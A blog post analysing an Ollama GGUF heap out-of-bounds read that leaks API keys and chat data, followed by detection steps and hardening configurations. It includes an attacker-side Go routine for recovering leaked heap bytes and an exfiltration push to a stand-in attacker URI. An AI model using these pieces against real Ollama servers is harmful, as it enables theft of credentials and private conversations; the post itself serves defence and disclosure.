I run Ollama on my own box, and I noticed CVE-2026-7482 the way most self-hosters did: a Mastodon post from someone at Cyera Research linking to a write-up titled "Bleeding Llama." The name is doing a lot of work. The bug is a heap out-of-bounds read in the GGUF model loader, triggered by an unauthenticated POST to /api/create, and the data that leaks is whatever Ollama happens to have in adjacent heap pages: API keys, environment variables, system prompts, and chat data from concurrent sessions.

The CVSS score is 9.1. The patch is in Ollama 0.17.1. The 300,000-instance figure in the headline comes from Cyera's scan of the public IPv4 space on 10 May 2026. If you are running Ollama on an address the internet can reach and have not updated since 28 April, you are in that count.

This is a deep dive, not a brief, so the structure is: how the bug actually works, how you check whether you have been hit, how you harden an Ollama install against this class of bug rather than just this specific one, and what to take away about the wider self-hosted AI surface.

What GGUF is and why Ollama loads it without authentication

GGUF is the file format that llama.cpp and its downstream consumers, including Ollama, use to store quantised model weights. A GGUF file contains a header, a metadata block (model name, architecture, tokenizer config, quantisation parameters), and the tensor data itself. Tensors are described by a name, a shape (the list of per-dimension element counts), a quantisation type, and the offset into the file where the actual data starts.
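A quick sketch of that per-tensor descriptor, in Go since that is what Ollama is written in. The field names follow the GGUF specification rather than Ollama's own identifiers, so treat them as illustrative:

// Per-tensor descriptor as a GGUF loader sees it (illustrative field names).
type tensorInfo struct {
  Name       string   // e.g. "blk.0.attn_q.weight"
  Dimensions []uint64 // the shape; the element count is the product of these
  Type       uint32   // quantisation type: F32, F16, Q4_K, ...
  Offset     uint64   // byte offset of this tensor's data within the data section
}

Everything the loader needs to size its reads comes from these fields, and all of them are attacker-controlled in an uploaded file.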

Ollama exposes three endpoints relevant to this CVE:

  • POST /api/blobs/sha256:[digest], upload a binary blob, used by the CLI to upload model files to the daemon
  • POST /api/create, create a model entry from an uploaded blob, including converting it through quantisation
  • POST /api/push, push a model to a remote registry

By default, Ollama binds to 0.0.0.0:11434 with no authentication. That choice makes sense for a local-development tool. It makes very little sense once the port is open to the internet, which is the configuration 300,000 instances were running in when Cyera scanned.

The vulnerable path: POST /api/blobs/... accepts the malicious GGUF upload, POST /api/create kicks off the conversion that performs the OOB read, and POST /api/push ships the converted file (containing the leaked memory) to an attacker-controlled URL. All three endpoints are unauthenticated. The attacker does not need credentials, social engineering, or a foothold. They need an HTTP client and an IP address.

How the out-of-bounds read happens

The bug is in how Ollama trusts the tensor shape field when it computes how much data to read.

A GGUF tensor declares its shape as a list of dimensions. The element count is the product of the dimensions: a shape of [3, 3, 3] declares 27 elements. The actual tensor data in the file is a contiguous block of bytes whose size depends on the element count and the quantisation type.

Ollama's Elements() function multiplies the dimensions to get the count. The code that reads the tensor then iterates that many times, pulling element-sized chunks from the buffer. Nothing checks that the declared element count fits within the buffer the file actually contains. A GGUF file can declare a shape of [1, 1, 1000000] while providing only 100 bytes of tensor data. The reader will iterate one million times anyway, reading whatever happens to be in memory after the 100 bytes.

This is a classic length-confusion bug. The defence would be a single boundary check: verify that Elements() * element_size <= remaining_buffer_size. That check was not there. Adding it is what 0.17.1 does.
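A sketch of the bug class in Go; it is not Ollama's actual source, and the types and function names are illustrative. In the sketch the leak relies on data being a short window into a larger reusable buffer, which is one way a Go program reads adjacent memory without panicking; the exact mechanism in Ollama is in the Cyera write-up. The fixed variant shows the shape of the check that 0.17.1 adds.

// Illustrative sketch of the length-confusion bug; not Ollama's real code.
package gguf

import "fmt"

type tensor struct {
  shape    []uint64 // attacker-controlled dimensions from the GGUF header
  elemSize uint64   // bytes per element for the declared type (2 for F16)
}

// elements plays the role of Elements(): the product of the dimensions.
func (t tensor) elements() uint64 {
  n := uint64(1)
  for _, d := range t.shape {
    n *= d // [1, 1, 1000000] -> 1,000,000, however little data follows
  }
  return n
}

// Vulnerable shape: trust the declared count. If data is a short window into a
// larger reusable buffer (len(data) < cap(data)), the re-slice below does not
// panic; it quietly returns stale bytes from whatever used the buffer before.
func readVulnerable(t tensor, data []byte) []byte {
  out := make([]byte, 0, t.elements()*t.elemSize)
  for i := uint64(0); i < t.elements(); i++ {
    off := i * t.elemSize
    out = append(out, data[off:off+t.elemSize]...)
  }
  return out
}

// Fixed shape: the single boundary check. Real code should also guard the
// multiplications against overflow before comparing.
func readChecked(t tensor, data []byte) ([]byte, error) {
  need := t.elements() * t.elemSize
  if need > uint64(len(data)) {
    return nil, fmt.Errorf("tensor declares %d bytes but the file provides %d", need, len(data))
  }
  return append([]byte(nil), data[:need]...), nil
}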

The attacker amplifies the leak by requesting F16-to-F32 quantisation conversion. F16 is 2 bytes per element, F32 is 4 bytes per element. The conversion is mathematically lossless (every F16 value is exactly representable in F32), so each two-byte chunk of leaked memory, read as an F16 value, maps to a distinct F32 value in the output, and that mapping can be inverted. The result is a new model file on disk containing the leaked memory as an F32 tensor that, when read back and converted, hands the attacker the raw heap bytes that were adjacent to the original tensor buffer.
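To make the inversion concrete, here is an attacker-side recovery sketch in Go; it is not the Cyera proof of concept. The half-to-float decoder follows IEEE 754, and the one caveat, noted in the comments, is that NaN bit patterns may not survive a conversion performed with hardware float instructions.

// Recovering leaked heap bytes from the exfiltrated F32 tensor: every 16-bit
// input pattern maps to a distinct float32 bit pattern, so a 65,536-entry
// reverse table inverts the conversion.
package main

import (
  "encoding/binary"
  "fmt"
  "math"
)

// f16ToF32 decodes an IEEE 754 half-precision bit pattern into a float32.
func f16ToF32(h uint16) float32 {
  sign := uint32(h>>15) & 1
  exp := uint32(h>>10) & 0x1f
  mant := uint32(h) & 0x3ff
  var bits uint32
  switch {
  case exp == 0 && mant == 0: // signed zero
    bits = sign << 31
  case exp == 0: // subnormal: renormalise for float32's wider exponent range
    e := uint32(127 - 15 + 1)
    for mant&0x400 == 0 {
      mant <<= 1
      e--
    }
    bits = sign<<31 | e<<23 | (mant&0x3ff)<<13
  case exp == 0x1f: // infinity or NaN (payloads may not survive real converters)
    bits = sign<<31 | 0xff<<23 | mant<<13
  default: // normal number: rebias the exponent, widen the mantissa
    bits = sign<<31 | (exp+112)<<23 | mant<<13
  }
  return math.Float32frombits(bits)
}

func main() {
  // Build the reverse map once: float32 bits -> the half bits that produced them.
  reverse := make(map[uint32]uint16, 1<<16)
  for h := 0; h <= 0xffff; h++ {
    reverse[math.Float32bits(f16ToF32(uint16(h)))] = uint16(h)
  }

  // Stand-in for values read out of the exfiltrated F32 tensor.
  leaked := []float32{f16ToF32(0x6b32), f16ToF32(0x2d48)}

  recovered := make([]byte, 0, 2*len(leaked))
  for _, v := range leaked {
    h := reverse[math.Float32bits(v)]
    var b [2]byte
    binary.LittleEndian.PutUint16(b[:], h) // GGUF tensor data is little-endian
    recovered = append(recovered, b[:]...)
  }
  fmt.Printf("% x\n", recovered) // the bytes that sat next to the tensor on the heap
}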

Then they push the file. POST /api/push with a model name formatted as a URI (http://attacker.com/leak/model:tag) sends the file to the attacker's server. The Ollama push code does not validate that the target is a known registry; it treats the URI as the destination.

The leak is delivered. The Ollama process keeps running. The operator notices nothing.

What the leak contains

The heap region adjacent to a tensor buffer in Ollama is whatever Ollama happens to have allocated near that buffer. In practice, on a busy instance:

  • API keys. Ollama integrations frequently authenticate against external APIs (OpenAI fallback, Anthropic for hybrid pipelines, Hugging Face for model downloads). Those credentials live in environment variables that get copied onto the heap when the process reads them.
  • Environment variables. The entire environ block, including credentials for whatever else the host runs.
  • System prompts. The system prompt from any concurrent session leaks. For agent frameworks that embed business logic, customer instructions, or sensitive policy text into system prompts, those prompts are now exfiltrated.
  • User chat data. Prompts and responses from concurrent sessions, because Ollama keeps recent conversation context in memory for performance reasons.
  • Tool outputs. When Ollama is wired into an agent framework that runs tools, the outputs of those tools (including file contents, command outputs, and API responses) pass through the same process memory.

The Cyera write-up has examples. The pattern is depressingly familiar: API keys with recognisable prefixes (sk-, hf_, AWS access key format), URLs containing internal hostnames, and snippets of conversation that read as obviously real because the language model output style is hard to forge in a memory dump.

How to check whether you are exposed

The straightforward check is the version:

ollama --version

Anything before 0.17.1 is vulnerable.

To check whether the daemon is reachable from outside the host:

# From a separate machine
curl http://<server-ip>:11434/api/tags

If a machine other than the host itself gets back a JSON response listing your models, the port is open. If your Ollama instance is on a server with a public IP and the port is exposed, you should assume the bug has been triggered against you at some point in the past 13 days. The exploit is trivial and there is no rate limit on the endpoint.
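From the host itself, you can also check which address the daemon is bound to; a quick look with ss (part of iproute2), where 0.0.0.0 or [::] in the local-address column means every interface:

# On the Ollama host
sudo ss -ltnp 'sport = :11434'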

For evidence of exploitation, check the Ollama logs for POST /api/create and /api/blobs requests you did not make yourself, and for /api/push calls to destinations that are not your own registry. The logs are at ~/.ollama/logs/server.log by default; installs that run Ollama as a systemd service log to the journal instead. If the log retention is less than 13 days, you probably do not have the records to tell whether the bug was triggered, and the safe assumption is that it was.
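A rough sketch of that check; the exact log line format varies between Ollama versions, so treat the patterns as a starting point rather than a signature, and adjust the unit name if yours differs:

grep -E '/api/(create|push|blobs)' ~/.ollama/logs/server.log
# Or, for a systemd-managed install:
journalctl -u ollama --since "2026-04-28" | grep -E '/api/(create|push|blobs)'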

If your Ollama process has access to credentials in the environment (which it does, because that is how Ollama loads its own configuration), assume those credentials are compromised. Rotate them.

Hardening an Ollama install

Updating to 0.17.1 closes this specific CVE. It does not close the wider problem, which is that Ollama is a developer-experience-first tool that binds to 0.0.0.0 with no authentication and exposes model-management endpoints that have not been hardened against adversarial inputs. The next bug in this class will land on the same architecture.

The architectural fixes, in order of priority:

1. Do not expose Ollama to the internet directly. Bind to localhost only:

export OLLAMA_HOST=127.0.0.1:11434
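An export only affects processes started from that shell. If Ollama runs as a systemd service, which is what the Linux install script sets up, put the variable in a unit override instead (assuming the service is named ollama):

sudo systemctl edit ollama
# In the override that opens:
#   [Service]
#   Environment="OLLAMA_HOST=127.0.0.1:11434"
sudo systemctl restart ollama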

If you need network access, put Ollama behind a reverse proxy that enforces authentication. Caddy, Nginx, Traefik, or Cloudflare Access in front of 127.0.0.1:11434 is the deployment pattern that matches the threat model. The proxy handles authentication. Ollama handles inference. Nothing on the public internet talks directly to the Ollama API.

A minimal Caddy block:

ollama.example.com {
  basicauth {
    user $2a$14$<bcrypt-hash>
  }
  reverse_proxy 127.0.0.1:11434
}

2. Restrict the network namespace. On a Linux host running Ollama in a container, do not give the container host networking. It should reach the GPU but not the wider host network. An internal Docker network shared only with the reverse proxy, with the proxy's port as the only published port, is the configuration that works; --network=host is the one that does not.
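A minimal sketch of that layout, assuming the official ollama/ollama and caddy images and the NVIDIA container toolkit for GPU access; the names are illustrative, and the Caddyfile's reverse_proxy target becomes ollama:11434 instead of 127.0.0.1:11434:

# Internal network: containers on it can reach each other but nothing else.
docker network create --internal ollama-net

# Ollama: no published ports; reachable only over the internal network.
docker run -d --name ollama --network ollama-net --gpus all \
  -v ollama-models:/root/.ollama ollama/ollama

# Caddy: the only published port on the host; joins the internal network
# so it can reach the Ollama container by name.
docker run -d --name caddy -p 443:443 \
  -v $PWD/Caddyfile:/etc/caddy/Caddyfile:ro caddy
docker network connect ollama-net caddy

The trade-off: a fully internal network also blocks the container's outbound traffic, including model downloads, which incidentally defeats the /api/push exfiltration step; temporarily connect a normal network when you need to pull models.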

3. Isolate model management from inference. The /api/create and /api/push endpoints are administrative. They have a different security profile than /api/chat and /api/generate. If the reverse proxy can route the administrative paths to a separate authentication policy (TLS client cert, separate basic auth, IP allowlist) while leaving the inference paths under the inference user's credentials, the management surface stops being part of the inference attack surface.

In Caddy:

ollama.example.com {
  @admin path /api/create /api/push /api/pull /api/blobs/*
  handle @admin {
    basicauth {
      admin $2a$14$<admin-bcrypt-hash>
    }
    reverse_proxy 127.0.0.1:11434
  }
  handle {
    basicauth {
      user $2a$14$<user-bcrypt-hash>
    }
    reverse_proxy 127.0.0.1:11434
  }
}

4. Run Ollama as a low-privilege user. A dedicated ollama system account with no shell, no sudo, no access to anything outside its model directory. The heap leak still exposes whatever the process has access to, but the blast radius is bounded by the process's own permissions.

useradd -r -m -d /var/lib/ollama -s /usr/sbin/nologin ollama
chown -R ollama:ollama /var/lib/ollama

Run the systemd unit as that user, and remove credentials from the environment that the Ollama process does not strictly need.
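A sketch of the corresponding override (sudo systemctl edit ollama). User and Group do the essential part; the remaining directives are optional sandboxing, the model path is illustrative, and anything that breaks GPU access on your setup can be dropped:

[Service]
User=ollama
Group=ollama
# An empty assignment clears Environment= lines inherited from the packaged
# unit; re-add only what the process actually needs.
Environment=
Environment="OLLAMA_HOST=127.0.0.1:11434"
Environment="OLLAMA_MODELS=/var/lib/ollama/models"
NoNewPrivileges=true
ProtectSystem=strict
ProtectHome=true
PrivateTmp=true
ReadWritePaths=/var/lib/ollama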

5. Audit what is on the host. If your Ollama instance shares a host with a database, an application server, or a credential store, the heap leak is leaking those too. Whether Ollama itself uses those credentials is not the point; the point is that they share an environment. The deployment pattern that contains this risk is one host, one purpose. The deployment pattern that does not is "I had a GPU server, so I put everything on it."

What this says about the wider self-hosted AI surface

Ollama is the most popular self-hosted inference runtime. Its peers (LocalAI, vLLM, llama.cpp's server mode, text-generation-webui) have similar architectures: they bind to a port, expose an API, default to no authentication, and parse adversary-controllable model file formats. The same class of bug exists in the parsers for SafeTensors, ONNX, and the various proprietary formats. Some of those parsers are more battle-tested than GGUF. Most are not.

The self-hosted AI movement, which I am part of, has prioritised developer experience over hardening. That trade-off was defensible when these tools ran on developer laptops behind home routers. It is less defensible now that people are running them on cloud VMs with public IPs because they need the GPU on a server that the team can reach.

The pattern that scales the trade-off into a security problem is the gap between "I am running this locally" (meaning: it is on my machine and the threat model is local processes) and "I am running this on my own server" (meaning: it is on a cloud VM with a public IP and the threat model is the internet). The defaults are identical in both cases. The exposure is not.

The fix is not to wait for Ollama to ship authentication by default, though that would help. The fix is to deploy Ollama the way you would deploy any other backend service: localhost binding, reverse proxy with auth, network isolation, least privilege. The tooling for this is mature and the configuration is short. The bit that is hard is acknowledging that "self-hosted" and "exposed to the internet without authentication" are different things, and that the developer-tooling defaults are not the deployment-time defaults.

For systems running Ollama on the public internet today, the immediate steps are: update to 0.17.1, rotate credentials, restrict the network exposure. The longer steps are: pick a reverse proxy, write the auth policy, separate the model-management surface from the inference surface, and treat the install like the production service it has become.

Read the full Cyera Research write-up for the bug-hunting timeline, the proof-of-concept code, and the responsible-disclosure exchange with the Ollama maintainers.


Daniel Gustafsson